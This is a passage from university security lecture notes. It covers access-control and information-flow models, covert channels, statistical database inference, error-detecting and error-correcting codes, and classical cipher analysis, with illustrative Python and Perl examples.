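    return ilevel[subj] <= ilevel[obj]


def biba_can_write(subj, obj, ilevel):
    """No write-up: s may write o iff i(o) <= i(s)."""
    return ilevel[obj] <= ilevel[subj]


def biba_low_watermark_read(subj, obj, ilevel):
    """Low-water-mark: the read is allowed, but afterwards i'(s) = min(i(s), i(o)).
    Returns the updated integrity table."""
    new = dict(ilevel)
    new[subj] = min(ilevel[subj], ilevel[obj])
    return new


# Constructed labels: alice is cleared Secret for category nuclear, bob is
# Confidential with no categories; plan is Secret/nuclear, memo is Unclassified.
LABELS = {
    "alice": L("S", "nuclear"),
    "bob": L("C"),
    "plan": L("S", "nuclear"),
    "memo": L("U"),
}

if __name__ == "__main__":
    print("alice reads plan :", blp_can_read("alice", "plan", LABELS))    # allowed
    print("bob reads plan   :", blp_can_read("bob", "plan", LABELS))      # read-up, refused
    print("alice writes memo:", blp_can_write("alice", "memo", LABELS))   # write-down, refused
    print("bob writes plan  :", blp_can_write("bob", "plan", LABELS))     # write-up, allowed
    integ = {"auditor": 3, "webapp": 1, "ledger": 3, "upload": 0}
    print("webapp writes ledger:", biba_can_write("webapp", "ledger", integ))
    print("auditor reads upload:", biba_can_read("auditor", "upload", integ))
    print("auditor after low-water-mark read of upload:",
          biba_low_watermark_read("auditor", "upload", integ)["auditor"])
```

The refused "alice writes memo" case is exactly the Trojan Horse path the slides describe: whatever program alice runs at Secret cannot copy the plan into an Unclassified file, however the access control matrix is set. Note that the model checks labels only; it says nothing about covert channels, which come later in the notes.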
Clark-Wilson, integrity
Transactions are defined through certification rules.

The Clark-Wilson model has the following terminology:

Term   Definition
CDI    Constrained Data Item (data subject to integrity control)
UDI    Unconstrained Data Item (data not subject to control)
IVP    Integrity Verification Procedure (tests that the CDIs are in a valid state)
TP     Transformation Procedure (the only means of changing a CDI; takes CDIs from one valid state to another)
Chapter 6
Lecture 6 - Errors
Assignment 1
Form your groups,
Select your project,
Email me with your proposal for approval
Assignment 1
Literature review - not a survey :(

Formal paper - format in either word.zip or latex2e.zip in http://www.comp.nus.edu.sg/~cs3235/2003-semesterI/

Heading, Author(s), abstract (?), Introduction, body of paper, Summary/Conclusion, References

10-50 pages, 5-50 references
Assignment 2
More detailed, in-depth study
Not necessarily a software development project
Comparison, research, idea, program
Mid semester Test
9th October 2003
LT27, 14:30
MCQ, closed book
Covers everything up to the lecture before...
Last session
• Channel properties
• Entropy
• Models
This session
• Information flow
• Simple error detection
• Simple error correction
• Encryption
Information flow (Chapter 16)
We may also, more abstractly, model some security policies by considering the flow of information in a system.

We can use entropy to formalize this.

In this context, we can establish quantitative results about information flow in a system, rather than just making absolute assertions [5].

[5] For example, "System X reveals no more than 25% of the input values".
Information flow
In the textbook we have a definition of information flow based on the conditional entropy H(x | y) of some x given y:

Definition 16-1. The command sequence c causes a flow of information from x to y′ (the value of y after c runs) if H(x | y′) < H(x | y). If y does not exist in the initial state s then H(x | y) = H(x).

We can use this to detect implicit flows of information, not just explicit ones in which we directly assign to an object.
Information flow
Consider the example on page 409 of the textbook:

if x = 1 then y := 0
           else y := 1;

After this code segment, we can determine whether x = 1 from y′ even though we never assign y directly from some function of x. In other words we have an implicit flow of information from x to y′.
Information flow
Formal treatment by considering the entropy of x. If the likelihood of x = 1 is 0.5, then H(x) = 1. We can also deduce that H(x | y′) = 0, since y′ determines x, and so

H(x | y′) = 0 < H(x | y) = H(x) = 1

and information is flowing from x to y′. Shannon's paper gives some background.
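As an added example (not code from the lecture notes), the following Python computes Definition 16-1 mechanically: a program is modelled as a function from x to y′, the distribution of x is given, and H(x | y′) is obtained by enumerating the joint distribution of (x, y′). It reproduces the slide's if-statement, a program with no flow, and a partial flow of the "reveals only part of the input" kind mentioned in the footnote. The programs and distributions are constructed.

```python
# Added example, not from the CS3235 notes. Conditional entropy H(x | y') for
# a program y' = f(x) under a known distribution of x, so that a flow from x
# to y' can be measured rather than asserted. Programs and distributions are
# constructed for the example.
import math
from collections import defaultdict


def entropy(dist):
    """H(X) in bits for a {value: probability} mapping."""
    return -sum(p * math.log2(p) for p in dist.values() if p > 0)


def conditional_entropy(x_dist, program):
    """H(x | y') where y' = program(x) and x ~ x_dist.

    H(x | y') = sum over y of P(y' = y) * H(x | y' = y), where the inner
    entropy is over the x values that the program maps to that y.
    """
    by_y = defaultdict(dict)
    for x, px in x_dist.items():
        by_y[program(x)][x] = px
    total = 0.0
    for xs in by_y.values():
        py = sum(xs.values())
        total += py * entropy({x: px / py for x, px in xs.items()})
    return total


def leaked_bits(x_dist, program):
    """H(x) - H(x | y'): how much of x the program's output reveals.
    Positive means the command sequence causes a flow from x to y'."""
    return entropy(x_dist) - conditional_entropy(x_dist, program)


# The slide's program: if x = 1 then y := 0 else y := 1
def branch_on_x(x):
    return 0 if x == 1 else 1


# No flow: y' does not depend on x.
def constant(x):
    return 0


# Partial flow: only the low bit of a 2-bit x reaches y'.
def low_bit(x):
    return x & 1


if __name__ == "__main__":
    fair_bit = {0: 0.5, 1: 0.5}
    print("H(x)              =", entropy(fair_bit))
    print("H(x | y') branch  =", conditional_entropy(fair_bit, branch_on_x))
    print("H(x | y') constant=", conditional_entropy(fair_bit, constant))
    two_bits = {v: 0.25 for v in range(4)}
    print("low_bit leaks", leaked_bits(two_bits, low_bit),
          "of", entropy(two_bits), "bits of x")
```

The branch reduces H(x | y′) from 1 to 0, a complete flow; the constant program leaves it at H(x) = 1, no flow; and `low_bit` leaks exactly one of the two bits of x, which is the kind of quantitative statement the footnote above has in mind.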
Confinement and covert channels
The confinement problem is one of preventing a system from leaking (possibly partial) information.

Sometimes a system has an unexpected path for the transmission of data, termed a covert channel, and through the use of this covert channel information may be leaked either by a malicious program or by accident.
Confinement and covert channels
Consider the set of permissions on a file.

An unscrupulous program could modify these permissions cyclically to transmit a very low data-rate message to another unscrupulous program, which polls the permission bits; no BLP rule is broken, since neither program reads or writes the file's contents.
Confinement and covert channels
We categorize covert channels into two kinds:

1. Storage channels: using the presence, absence or attributes of objects

2. Timing channels: the speed or timing of events

We can attempt to identify covert channels by building a shared resource matrix, determining which processes can read and write (or observe and modify) which resources.
Attacks on databases
A governing body may keep individual information secret, but release cumulative (aggregate) information.

For example: today's average temperature of SOC staff by nationality:

Singaporean  Malaysian  PRC   Poland  German  Australian  New Zealand  ....
36.8         36.7       36.9  37.1    36.5    38.2        38.1         ....
Attacks on databases
OK - this doesn't release any sensitive information on its own, but

what if another part of the database released the numbers of SOC staff by nationality...

Singaporean  Malaysian  PRC   Poland  German  Australian  New Zealand  ....
23           12         14    3       5       4           1            ....

By inference you can deduce that the temperature of a particular individual (the one New Zealander, at 38.1) is too high!
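As an added example (not code from the lecture notes), the following Python joins the two releases above and shows both the inference and the usual countermeasure: any aggregate cell built from a single person reveals that person's value, and a cell whose average already exceeds a threshold reveals that at least one member is above it. The figures are the slide's illustrative numbers; the fever threshold and the minimum cell size k are assumptions.

```python
# Added example, not from the CS3235 notes. Inference from two separately
# harmless statistical releases (per-group average and per-group head
# count). The values are the slide's illustrative numbers; the 37.5 threshold
# and the cell-size threshold k are assumptions.
AVG_TEMP = {"Singaporean": 36.8, "Malaysian": 36.7, "PRC": 36.9, "Poland": 37.1,
            "German": 36.5, "Australian": 38.2, "New Zealand": 38.1}
HEADCOUNT = {"Singaporean": 23, "Malaysian": 12, "PRC": 14, "Poland": 3,
             "German": 5, "Australian": 4, "New Zealand": 1}


def infer_individuals(averages, counts):
    """Join the releases: a group of size 1 pins its average on one person."""
    return {g: averages[g] for g, n in counts.items() if n == 1 and g in averages}


def groups_with_someone_above(averages, counts, threshold=37.5):
    """Groups whose average alone proves at least one member is above the
    threshold (for any group, some member is >= the mean). With n == 1 that
    member is identified outright."""
    return sorted(g for g in counts if averages[g] >= threshold)


def suppress_small_cells(table, counts, k=3):
    """Small-cell suppression: withhold any aggregate built from fewer than k people."""
    return {g: (v if counts[g] >= k else None) for g, v in table.items()}


def safe_release(averages, counts, k=3):
    """Release both tables with the same suppression so the join reveals nothing below k."""
    return (suppress_small_cells(averages, counts, k),
            suppress_small_cells(counts, counts, k))


if __name__ == "__main__":
    print("deduced individual values:", infer_individuals(AVG_TEMP, HEADCOUNT))
    print("groups proving someone is feverish:",
          groups_with_someone_above(AVG_TEMP, HEADCOUNT))
    avg, cnt = safe_release(AVG_TEMP, HEADCOUNT)
    print("released averages:", avg)
    print("released counts:  ", cnt)
```

Suppression of cells below k removes the exact inference, but not every disclosure: the Australian cell (4 people, average 38.2) still proves that at least one of four named-by-nationality people has a high temperature, and differencing two overlapping queries can rebuild a suppressed cell. That is why statistical databases need query-set controls, not just per-cell thresholds.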
This session
• Information flow
• Simple error detection
• Simple error correction
• Encryption
Simple check codes
Transmit data:
1 65 3 22 47 2
Transmit data+checksum:
1 65 3 22 47 2 140
One-way parity
A   0 1 0 0 0 0 0 1
0   0 0 1 1 0 0 0 0
D   0 1 0 0 0 1 0 0
B   0 1 0 0 0 0 1 0
B   0 1 0 0 0 0 1 0
C   0 1 0 0 0 0 1 1

Check:  0 1 1 1 0 1 1 0

(The six characters are A, 0, D, B, B, C in ASCII; each check bit is the even parity, i.e. the XOR, of its column.)
Two way parity
                        row parity
A   0 1 0 0 0 0 0 1     0
0   0 0 1 1 0 0 0 0     0
D   0 1 0 0 0 1 0 0     0
B   0 1 0 0 0 0 1 0     0
B   0 1 0 0 0 0 1 0     0
C   0 1 0 0 0 0 1 1     1

Check:  0 1 1 1 0 1 1 0     X

(X is the parity of the parity column, here 1; it must agree with the parity of the check row.)
Simple check codes
Parity of bits - detects all 1 bit errors, but...
Horizontal and vertical parity - better, but problems with repetitive errors
Sum of values - problems with repetitive errors
We want a better level of error checking.
Cyclic redundancy check codes
Treat the stream of transmitted bits as a representation of a polynomial with coefficients of 1:
10110 = x^4 + x^2 + x^1 = F(x)
Checksum bits are added to ensure that the final composite stream of bits is divisible by some other polynomial g(x).
Cyclic redundancy check codes
We can transform any stream F(x) into a stream T(x) which is divisible by g(x).
If there are errors in T(x), they take the form of a difference bit string E(x) and the final received bits are T(x) + E(x).
When the receiver gets a correct stream, it divides it by g(x) and gets no remainder.
Cyclic redundancy check codes
The question is: how likely is it that T(x) + E(x) will also divide with no remainder?
Single bits? - No: a single bit error means that E(x) will have only one term (x^1285, say). If the generator polynomial has the form x^n + ... + 1, such a term will never divide evenly.
Multiple bits? - Various generator polynomials are used with different properties. One factor of the polynomial must be x^1 + 1, because this ensures that all odd numbers of bit errors (1, 3, 5, 7, ...) are detected.
Some common generators:
• CRC-12 - x^12 + x^11 + x^3 + x^2 + x^1 + 1
• CRC-16 - x^16 + x^15 + x^2 + 1
• CRC-32 - x^32 + x^26 + x^23 + x^22 + x^16 + x^12 + x^11 + x^10 + x^8 + x^7 + x^5 + x^4 + x^2 + 1
• CRC-CCITT - x^16 + x^12 + x^5 + 1
Long division is easy!
Generator g(x): x^5 + x^2 + 1 (100101) and F(x): 101101011.
Divide F(x), followed by five zero bits (one per bit of the remainder), by g(x) using modulo-2 arithmetic (XOR, no carries); the remainder is appended to F(x) to give T(x):

              101001000
100101 ) 10110101100000
         100101
         ------
           100001
           100101
           ------
              100100
              100101
              ------
                  01000

T(x) = 10110101101000.
Long division is easy!
When this stream is received, it is divided again, but now there will be no remainder if the stream is received without errors.
[Figure: the divider as a five-stage shift register of D flip-flops D0 to D4 sharing one clock. Serial data enters D0 through an XOR gate, and a second XOR gate combines the output of D4 with the input of D2; the two taps correspond to the 1 and x^2 terms of g(x).]
Long division is easy!
Input data   D4 D3 D2 D1 D0   Note
...          0  0  0  0  0    Initial state
1            0  0  0  0  1    First bit
0            0  0  0  1  0    Second bit
1            0  0  1  0  1    Third bit
1            0  1  0  1  1
0            1  0  1  1  0
1            0  1  0  0  0
0            1  0  0  0  0
1            0  0  1  0  0
...
Long division is easy!
Input data   D4 D3 D2 D1 D0   Note
...
1            0  1  0  0  1
0            1  0  0  1  0
0            0  0  0  0  1
0            0  0  0  1  0
0            0  0  1  0  0
0            0  1  0  0  0
Case study: ethernet
Ethernet is used for networking computers, principally because of its speed and low cost. The maximum size of an ethernet frame is 1514 bytes[6], and a 32-bit FCS is calculated over the full length of the frame.
The FCS used is:
• CRC-32 - x^32 + x^26 + x^23 + x^22 + x^16 + x^12 + x^11 + x^10 + x^8 + x^7 + x^5 + x^4 + x^2 + 1
[6] 1500 bytes of data, a source and destination address each of six bytes, and a two byte type identifier. The frame also has a synchronizing header and trailer which is not checked by the CRC.
This session
• Information flow
• Simple error detection
• Simple error correction
• Encryption
Simple error correction
Methods used to correct errors:
• Ignore errors, while acknowledging correct data: ARQ (for Automatic Repeat reQuest).
• Error correcting codes (for computer memory)
Code types
We can divide error correcting codes (ECC) into continuous and block-based types. Convolutional encodings are used for continuous systems, and the common block-based codes are:
• Hamming codes (for correcting single bit errors),
• Golay codes (for correcting up to three bit errors), and
• Bose-Chaudhuri-Hocquenghem (BCH) codes (for correcting block errors).
Combining error correcting codes
Different types of error correcting codes can be combined to produce composite codes.
For example, Reed-Solomon block codes are often combined with convolutional codes to improve all-round performance.
In this combined setup, the convolutional code corrects randomly distributed bit errors but not bursts of errors, while the Reed-Solomon code corrects the burst errors.
Accepting bad data
Sometimes we are willing to accept bad data...
BER and noise
System                        Error rate (errors/bit)
Wiring of internal circuits   10^-15
Memory chips                  10^-14
Hard disk                     10^-9
Optical drives                10^-8
Coaxial cable                 10^-6
Optical disk (CD)             10^-5
Telephone System              10^-4
BER and noise
We can determine the theoretical channel capacity knowing the SNR:
• BER is 0.01, channel capacity C ≈ 0.92 bits/symbol.
• BER is 0.001, channel capacity C ≈ 0.99 bits/symbol.
• BER is 0, channel capacity C = 1 bits/symbol.
The theoretical maximum channel capacity is quite close to the perfect channel capacity, even if the BER is high.
Reducing BER
Increase the signal (power), or
Reduce the noise (often not possible), or
Use ECC.
The benefit of error correcting codes is that they can improve the received BER without increasing the transmitted power. This performance improvement is measured as a system gain.
Reducing BER
Example: Consider a system without ECC giving a BER of 0.001 with a S/N ratio of 30dB (1000:1). If we were to use an ECC codec, we might get the same BER of 0.001 with a S/N ratio of 20dB (100:1). We say that the system gain due to ECC is 10dB (10:1).
Bad ECC scheme: repetition
An initial scheme to correct transmission errors might be to just repeat bits[7].
Data:     0   1   0   0   1   1   1   1   ...
Transmit: 000 111 000 000 111 111 111 111 ...
If we send three identical bits for every bit we wish to transmit, we can then use a voting system to determine the most likely bit. If our natural BER due to noise was 0.01, with three bits we would achieve a synthetic BER of 0.0001, but our channel capacity is reduced to about C = 0.31 bits/symbol.
[7] Note: there is no point in repeating bits twice. You must repeat three times, or 5 times, and then vote to decide the best value.
Bad ECC scheme: repetition
We can see from this that the rate of transmission using repetition has to approach zero to achieve more and more reliable transmission.
However, we know that the theoretical rate should be equal to or just below the channel capacity C.
Convolutional and other encodings can achieve rates of transmission close to the theoretical maximum.
ECC scheme: Hamming
Hamming codes are block-based error correcting codes.
We add hamming bits to a string.
Here we derive the inequality used to determine how many extra hamming bits are needed for an arbitrary bit string.
ECC scheme: Hamming
The hamming distance is a measure of how FAR apart two bit strings are: the number of positions in which they differ, which is the number of ones in their XOR.
A:       0 1 0 1 1 1 0 0 0 1 1 1
B:       0 1 1 1 1 1 1 0 0 1 0 1
A XOR B: 0 0 1 0 0 0 1 0 0 0 1 0
Here the XOR has three ones, so the hamming distance between A and B is 3.
ECC scheme: Hamming
If we had two bit strings X and Y representing two characters, and the hamming distance between the two codes was d, we could turn X into Y with d single bit errors.
• If we had an encoding scheme (for say ASCII characters) and the minimum hamming distance between any two codes was d + 1, we could detect d single bit errors[8].
• We can correct up to d single bit errors in an encoding scheme if the minimum hamming distance is 2d + 1.
[8] Because a code d bits away from a correct code is not in the encoding.
ECC scheme: Hamming
If we now encode m bits using r extra hamming bits to make a total of n = m + r, we can count how many correct and incorrect hamming encodings we should have. With m bits we have 2^m unique messages, each with n illegal encodings (one for each single bit error), and all of these must fit in the 2^n possible n-bit strings:
(n + 1) 2^m ≤ 2^n
(m + r + 1) 2^m ≤ 2^n
m + r + 1 ≤ 2^(n − m)
m + r + 1 ≤ 2^r
ECC scheme: Hamming
We solve this inequality, and then choose R, the next integer larger than r.
Example: If we wanted to encode 8 bit values (m = 8) and be able to recognise single bit errors:
8 + r + 1 ≤ 2^r
9 ≤ 2^r − r
r ≈ 3.5
R = 4
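As an added Python example (not from the notes), the inequality solved for the smallest R, and a Hamming encoder and decoder for m = 8, R = 4 showing that the four extra bits locate and correct any single bit error. The bit layout, with parity bits at positions 1, 2, 4 and 8 and the parity at 2^p covering every position whose number has bit p set, is the standard Hamming layout and is my assumption, since the notes do not give one.

```python
# Added example (not from the lecture notes): smallest r with m + r + 1 <= 2^r,
# and a Hamming encoder/decoder using that many parity bits. Positions are
# numbered from 1; parity bits sit at the powers of two (1, 2, 4, 8, ...).
# Layout assumption: the parity bit at position 2**p covers every position
# whose number has bit p set, so the failed checks spell out the bad position.


def hamming_bits_needed(m: int) -> int:
    """R on the slide: the smallest integer r with m + r + 1 <= 2**r."""
    r = 1
    while m + r + 1 > 2 ** r:
        r += 1
    return r


def hamming_encode(data: str) -> str:
    """Return the n = m + r bit codeword for data (a '0'/'1' string)."""
    m = len(data)
    r = hamming_bits_needed(m)
    n = m + r
    code = [0] * (n + 1)                      # index 0 unused; positions 1..n
    bits = iter(int(b) for b in data)
    for pos in range(1, n + 1):
        if pos & (pos - 1):                   # not a power of two: a data position
            code[pos] = next(bits)
    for p in range(r):
        pb = 1 << p                           # parity position 1, 2, 4, ...
        covered = (code[pos] for pos in range(1, n + 1) if pos & pb and pos != pb)
        code[pb] = sum(covered) % 2           # even parity over the covered bits
    return "".join(str(b) for b in code[1:])


def hamming_decode(codeword: str) -> tuple:
    """Return (data, corrected_position); position 0 means no error was seen."""
    n = len(codeword)
    code = [0] + [int(b) for b in codeword]
    syndrome = 0
    for p in range(n.bit_length()):
        pb = 1 << p
        if pb > n:
            break
        if sum(code[pos] for pos in range(1, n + 1) if pos & pb) % 2:
            syndrome |= pb                    # this parity check failed
    if syndrome:
        code[syndrome] ^= 1                   # the syndrome names the bad position
    data = "".join(str(code[pos]) for pos in range(1, n + 1) if pos & (pos - 1))
    return data, syndrome


if __name__ == "__main__":
    print("R for m = 8:", hamming_bits_needed(8))          # 4
    cw = hamming_encode("10110011")
    print("codeword:", cw)                                  # 12 bits
    damaged = cw[:6] + ("1" if cw[6] == "0" else "0") + cw[7:]
    print("decoded damaged word:", hamming_decode(damaged))  # ('10110011', 7)
```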
Reed-Solomon codes
Reed-Solomon codes are block-based error correcting codes which are particularly good at correcting bursts (sequences) of bit errors.
They are found in a wide range of digital communications and storage applications.
Reed-Solomon codes are used to correct errors in digital wireless applications such as wireless LAN systems, and low Earth orbit (LEO) satellite communication systems.
Reed-Solomon codes
A Reed-Solomon code is specified as
• RS(n,k) with s-bit symbols.
This means that the encoder takes k data symbols of s bits each and adds parity symbols to make an n symbol codeword. There are n − k parity symbols of s bits each.
A Reed-Solomon decoder can correct up to t symbols that contain errors in a codeword, where
2t = n − k
Reed-Solomon code
Example: A popular Reed-Solomon code is RS(255,223) with 8-bit symbols. Each codeword contains 255 code word bytes, of which 223 bytes are data and 32 bytes are parity. In this example, n = 255, k = 223, and s = 8.
2t = 32
and so t = 16
The Reed-Solomon decoder in this example can correct any 16 symbol errors in the codeword.
Chapter 7
Lecture 7 - Encryption
Mid semester Test
9th October 2003
LT27, 14:30
MCQ, closed book
Covers everything up to the lecture before...
Last session
• Information flow
• Simple error detection
• Simple error correction
This session
• Finish on error correction
• Encryption
  – Symmetric keys
    ∗ DES
  – Public keys
    ∗ RSA
Key points from last week
Error detection vs Error correction
Mathematical analysis
Error rate, noise, channel capacity
Theoretical vs actual channel capacity
This session
• Finish on error correction
• Encryption
  – Symmetric keys
    ∗ DES
  – Public keys
    ∗ RSA
Convolutional codes
Convolutional codes operate continuously and so are especially useful in data transmission systems.
The convolutional encoder operates on a continuous stream of data using a shift register to produce a continuous encoded output stream.
Convolutional codes
[Figure: a convolutional encoder built from a clocked shift register of D flip-flops, with Data In feeding the register and Data Out taken from it.]
The received bit sequence can be examined for the most likely correct output sequence.
Trellis diagram
[Figure: trellis diagram with four encoder states A, B, C and D; each transition between states is labelled with the two output bits it produces (00, 01, 10 or 11).]
Most likely path
If we were to input the sequence 011010, we would get the following trace through the trellis, with the bit sequence output as 001110110101:
[Figure: the path through states A, B, C and D taken for input 011010, with the two output bits written on each transition.]
Convolutional codes
Determine the most likely path, even with large numbers of bit errors.
A convolutional encoding can often reduce errors by a factor of 10^2 to 10^3.
Viterbi decoding
The Viterbi algorithm tries to find the most likely received data sequence, by keeping track of the four most likely paths through the trellis (one per state).
For each path, a running count of the hamming distance between the received sequence and the path is maintained.
The most likely received string is the one with the lowest hamming distance.
This session
• Finish on error correction
• Encryption
  – Symmetric keys
    ∗ DES
  – Public keys
    ∗ RSA
Encryption and authentication
Security and cryptographic systems act to reduce failure of systems due to the following threats:
Interruption - attacks the availability of a service (Denial of Service).
Interception - attacks confidentiality.
Modification - attacks integrity.
Fabrication - attacks authenticity. Note that you may not need to decode a signal to fabricate it - you might just record and replay it.
Encoding and deciphering
I could have told her the truth - that the same calculation which had served me for deciphering the manuscript had enabled me to learn the word - but on a caprice it struck me to tell her that a genie had revealed it to me. This false disclosure fettered Madame d’Urfé to me. That day I became the master of her soul, and I abused my power.
We call these systems symmetric key systems...
Symmetric key systems
[Figure: symmetric key system. The plaintext P is encrypted under key Ki to give the ciphertext X = Ki[P], and the receiver decrypts X with the same key Ki to recover the plaintext P.]
Simple ciphers - transposition
Transposition ciphers just re-order the letters of the original message. This is known as an anagram:
• parliament is an anagram of partial men
• Eleven plus two is an anagram of Twelve plus one
Perhaps you would like to see if you can unscramble “age prison”, or “try open”.
Transposition
Detect a transposition cipher with the frequencies of the letters, and letter pairs.
If the frequency of single letters in the ciphertext is as expected for the language, but the frequencies of letter pairs are wrong, then the cipher may be a transposition.
This sort of analysis can also assist in unscrambling a transposition ciphertext, by arranging the letters in their letter pairs.
Simple ciphers - substitution
Substitution cipher systems encode the input stream using a substitution rule.
The Cæsar cipher is an example of a simple substitution cipher system, but it can be cracked in at most 25 attempts by just trying each of the 25 values in the keyspace.
Substitution
Code Encoding
A Q
B V
C X
D W
... ...
If the mapping was more randomly chosen it is called a monoalphabetic substitution cipher, and the keyspace for encoding 26 letters would be 26! − 1 = 403,291,461,126,605,635,583,999,999.
Substitution
If we could decrypt 1,000,000 messages in a second, then the average time to find a solution would be about 6,394,144,170,576 years!
We might be lulled into a sense of security by these big numbers, but of course this sort of cipher can be subject to frequency analysis.
Frequency analysis
In the English language, the most common letters are: "E T A O N I S H R D L U ..." (from most to least common), and we may use the frequency of the encrypted data to make good guesses at the original plaintext.
We may also look for digrams and trigrams (th, the).
Vigenère
The Vigenère cipher is a polyalphabetic substitution cipher invented around 1520.
We use an encoding/decoding sheet, called a tableau, and a keyword or key sequence.
Vigenère
A B C D E F G H ...
A A B C D E F G H ...
B B C D E F G H I ...
C C D E F G H I J ...
D D E F G H I J K ...
E E F G H I J K L ...
F F G H I J K L M ...
G G H I J K L M N ...
H H I J K L M N O ...
... ... ... ... ... ... ... ... ... ...
CS3235 - Hugh Anderson’s notes. Page number: 333
Vigenère
If our keyword was BAD, then encoding HAD A FEED would result in

  Key     B A D B A D B A
  Text    H A D A F E E D
  Cipher  I A G B F H F D

If we can discover the length of the repeated key (in this case 3), and the text is long enough, we can just consider the cipher text to be a group of interleaved monoalphabetic substitution ciphers and solve each one accordingly.
Analysis
The index of coincidence is the probability that two randomly chosen letters from the cipher text will be the same, and it can help us discover the length of a key:

$$IC = \frac{1}{N(N-1)} \sum_{i=0}^{25} F_i (F_i - 1)$$

where $F_i$ is the frequency (count) of the occurrences of symbol $i$ and $N$ is the length of the cipher text. For English text the value is about 0.066; for uniformly random letters it is $1/26 \approx 0.038$. A polyalphabetic cipher flattens the letter distribution and pulls the IC towards 0.038, but taking every k-th letter of the cipher text for the right key length k gives columns that are each monoalphabetic, with the IC of English again.
Index of coincidence
A related test, implemented in the Perl script below: compare the text with itself rotated by skip places and count the positions where the letters agree. When skip is a multiple of the key length the aligned letters were enciphered with the same key letter, and the rate of agreement rises to that of plain English.

```perl
#!/usr/bin/perl
# usage: ic.pl SKIP < ciphertext
$skip = $ARGV[0];
@text = <STDIN>;                    # read the whole cipher text
$all = join('', @text);
$all =~ tr/a-z/A-Z/;                # upper-case ...
$all =~ tr/A-Z//cd;                 # ... and drop everything but letters
$header = substr($all, 0, $skip);
$shifted = substr($all, $skip) . $header;   # rotate left by $skip places
@alltxt = split(//, $all);
@shiftxt = split(//, $shifted);
$count = 0;
foreach $i (0 .. $#alltxt) {
    if ($alltxt[$i] eq $shiftxt[$i]) { $count++; }
}
printf("Index of Coincidence is: %2f\n", $count / scalar(@alltxt));
```

Show analysis using shifts of 1...2...3...
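The Vigenère example, the IC formula and the Perl shift test above, worked through in Python as an added example (this code is not from the lecture notes). It assumes the standard published English letter-frequency table (the slides give only the ordering E T A O N ...) and uses a constructed English paragraph, embedded below, as sample plaintext; the chi-squared scoring that picks each column's shift is the usual way of automating the "most common letter is E" guess.

```python
# Added example (not from the lecture notes): Vigenere encryption, the index of
# coincidence, the Perl script's shifted-coincidence test, and recovery of the
# key by frequency analysis of the interleaved columns.  ENGLISH_FREQ is the
# standard published table (an assumption; the slides only give the ordering).
from collections import Counter

ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
ENGLISH_FREQ = {  # percent of letters in typical English text
    "A": 8.17, "B": 1.49, "C": 2.78, "D": 4.25, "E": 12.70, "F": 2.23, "G": 2.02,
    "H": 6.09, "I": 6.97, "J": 0.15, "K": 0.77, "L": 4.03, "M": 2.41, "N": 6.75,
    "O": 7.51, "P": 1.93, "Q": 0.10, "R": 5.99, "S": 6.33, "T": 9.06, "U": 2.76,
    "V": 0.98, "W": 2.36, "X": 0.15, "Y": 1.97, "Z": 0.07,
}


def clean(text):
    """Upper-case and keep letters only (what the Perl script's tr/// does)."""
    return "".join(ch for ch in text.upper() if ch in ALPHABET)


def vigenere(text, key, decrypt=False):
    """Tableau lookup: shift each letter by the matching (repeating) key letter."""
    text, key = clean(text), clean(key)
    out = []
    for i, ch in enumerate(text):
        k = ALPHABET.index(key[i % len(key)])
        k = -k if decrypt else k
        out.append(ALPHABET[(ALPHABET.index(ch) + k) % 26])
    return "".join(out)


def index_of_coincidence(text):
    """IC = sum F_i (F_i - 1) / (N (N - 1)): about 0.066 for English, 0.038 for random letters."""
    n = len(text)
    if n < 2:
        return 0.0
    return sum(f * (f - 1) for f in Counter(text).values()) / (n * (n - 1))


def shifted_coincidence(text, skip):
    """The Perl script's test: fraction of positions where the text matches
    itself rotated by `skip`; it peaks when `skip` is a multiple of the key length."""
    rotated = text[skip:] + text[:skip]
    return sum(a == b for a, b in zip(text, rotated)) / len(text)


def column_ic(cipher, period):
    """Average IC of the `period` interleaved columns; high only when `period`
    is the key length (or a multiple of it), since each column is then monoalphabetic."""
    return sum(index_of_coincidence(cipher[i::period]) for i in range(period)) / period


def best_shift(column):
    """Frequency analysis of one column: the Caesar shift whose decryption is
    closest to English letter frequencies (chi-squared distance)."""
    n = len(column)
    scores = {}
    for shift in range(26):
        plain = Counter(ALPHABET[(ALPHABET.index(ch) - shift) % 26] for ch in column)
        scores[shift] = sum((plain[l] - n * ENGLISH_FREQ[l] / 100) ** 2
                            / (n * ENGLISH_FREQ[l] / 100) for l in ALPHABET)
    return min(scores, key=scores.get)


def recover_key(cipher, key_length):
    """Solve each interleaved column as a monoalphabetic substitution."""
    return "".join(ALPHABET[best_shift(cipher[i::key_length])] for i in range(key_length))


# Constructed sample plaintext (not from the notes), long enough for the statistics.
SAMPLE = ("The index of coincidence measures how likely two letters drawn at random from a "
          "text are the same. Ordinary English text scores about six and a half percent "
          "because some letters such as E and T occur far more often than others. A simple "
          "substitution does not change this number, but a polyalphabetic cipher flattens "
          "the distribution, and splitting the ciphertext into columns of the right period "
          "restores it. Once the period is known each column is an ordinary Caesar cipher "
          "and can be solved by comparing its letter counts with the expected English "
          "frequencies. The attack needs a reasonable amount of ciphertext, since with only "
          "a few letters per column the counts are too noisy to distinguish the true shift "
          "from its neighbours, which is why short messages were historically much harder "
          "to break than long reports sent under the same key.")

if __name__ == "__main__":
    print(vigenere("HAD A FEED", "BAD"))            # the slide's example: IAGBFHFD
    cipher = vigenere(SAMPLE, "BAD")
    for period in range(1, 7):                      # "shifts of 1...2...3..."
        print(period, round(column_ic(cipher, period), 3),
              round(shifted_coincidence(cipher, period), 3))
    print(recover_key(cipher, 3))                   # BAD
```

Multiples of the true key length (6, 9, ...) also score high in both tests, so take the smallest period whose columns look like English; with only a handful of letters per column neither statistic is reliable, which is the "text is long enough" condition on the slide.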
Index of coincidence
The ideas here were developed by William F. Friedman (The Index of Coincidence and its Applications in Cryptography, 1922).
Friedman also coined the words "cryptanalysis" and "cryptology".
Friedman worked on the solution of German code systems during the first (1914-1918) world war, and later became a world-renowned cryptologist.
This session
• Finish on error correction
• Encryption
  – Symmetric keys: DES
  – Public keys: RSA
S-box
Figure: a 4-bit S-box (the diagram's stages are labelled 4:2 and 2:4) and a P-box wiring the permutation (3,4,2,1).
S-boxes and P-boxes
The S-box (Substitution-Box) is a hardware device (or a lookup table in software) which maps n-bit input values to other n-bit values; when the mapping is one-to-one it can be represented as a permutation of the $2^n$ possible values. (The S-boxes of DES map 6 bits to 4, so they are not one-to-one.)
A P-box is just a simple permutation box: it rearranges bit positions.
If you use S-boxes and P-boxes together, in alternating layers, you have a product cipher, which is generally much harder to break than either component alone: the S-box supplies non-linearity and the P-box spreads each input bit's influence across the whole block.
DES - Data Encryption Standard
